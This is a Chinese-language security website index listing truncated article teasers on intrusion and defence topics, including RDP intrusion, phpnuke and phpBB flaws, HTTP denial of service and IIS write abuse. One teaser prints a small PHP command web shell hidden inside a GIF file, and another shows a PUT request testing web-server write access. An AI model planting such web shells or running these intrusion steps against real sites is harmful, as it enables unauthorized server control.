返回首页

  • 使用TCT紧急恢复并分析入侵后的系统 点击:205 好评:0

    从事系统管理工作,就算你非常小心翼翼地做好了一切防护,还是可能有入侵者能够突破你的防护进入系统,并且更改或者删除一些文件。这里,我们借用honeynet project里面的一些实例,来对一个unix下的实用工具软件tct及其相关辅助软件做简要说明。并且在最后再介绍另外一...

  • Win2003系统自带防火墙功能构筑安全防线 点击:58 好评:0

    现今社会是网络化的社会,网络安全越来越受到人们的广泛关注。无论使单位或家庭的局域网都必须考虑到服务器的安全性问题,因为它已经直接影响了我们的工作和生活。为解决这一问题,我们一般想到的就是配备硬件防火墙或者购买安装软件防火墙,但是硬件防火墙价格昂贵,软...

  • 从一次简单的3389入侵工程了解黑客技术 点击:154 好评:0

    首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!扫描的X-Scan V2.3、WINNTAutoAttack、流光! X-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(...

  • SAN是怎么利用phpnuke的漏洞做坏事的 点击:64 好评:0

    一、phpnuke的漏洞 2001-9-24日的bugtraq里,有一则短短的twlc security divison,说明了phpnuke所有版本(除了5.0RC1)的admin.php文件中,存在一个文件上传的漏洞,因为没有对用户的身份进行验证,所以任何一个用户都可以借此拷贝机器上的任意文件到phpnuke或者phpnuke...

  • 老鸟成长之路:菜鸟入门八种安全工具 点击:74 好评:-2

    您是怎样看待黑客及黑客现象的?崇拜?不齿?还是畏惧?本文将向您介绍中国黑客常用的八种工具及其防御方法。需要说明的是,这些只是初级黑客、甚至是不算黑客的“黑客”所使用的工具。 在真正的黑客看来这些工具是很初级的,但这些黑客工具对我们普通用户的杀伤力却是...

  • 利用HTTP进行拒绝服务攻击的一些构思 点击:604 好评:3

    由于HTTP协议是基于请求/响应范式的(相当于客户机/服务器)。一个客户机与服务器建立连接后,发送一个请求给服务器,请求方式的格式为:统一资源标识符(URL)、协议版本号,后边是MIME信息包括请求修饰符、客户机信息和可能的内容。服务器接到请求后,给予相应的响应信...

  • 菜鸟黑客上路-关于扫描的技巧与实战 点击:65 好评:0

    一个简单的扫描一个C类IP里BSDTELNET漏洞机器例子,下面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看: $cat num.c main() { int x; for (x=0;x256;x++) printf ("%d\n",x); } 上面这段C我想不用我多说了吧,他生成一个C类网的网络号,大家在编译后可...

  • 漏洞利用:对 iis 写权限的利用 点击:382 好评:0

    测试一个目录对于web用户是否具有写权限,采用如下方法:telnet到服务器的web端口(80)并发送一个如下请求: PUT /dir/my_file.txt HTTP/1.1 Host: iis-server Content-Length: 10 这时服务器会返回一个100( 继续)的信息: HTTP/1.1 100 Continue Server: Microsoft-IIS...

  • PHPBB 论坛 viewtopic.php SQL漏洞 点击:130 好评:0

    phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。 phpBB viewtopic.PHP没有正确过滤用户提交的输入,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感数据。 'viewtopic.php'脚本对用户提交给'highlight'的U...

  • 攻击方法:脚本后门注入图片新方法 点击:102 好评:0

    C:\>copy 1.gif+2.php 3.gif 上面一句的意思是把1.gif和2.php头尾相接生成一个新文件3.gif。2.php是我自己写的一个cmdphpshell文件(安全模式关闭),代码如下: ?$cmd=$_POST['cmd'];@system ($cmd);?> 然后在一个wfw.php中加上这么一句: ?include("3.gif");?> /b参...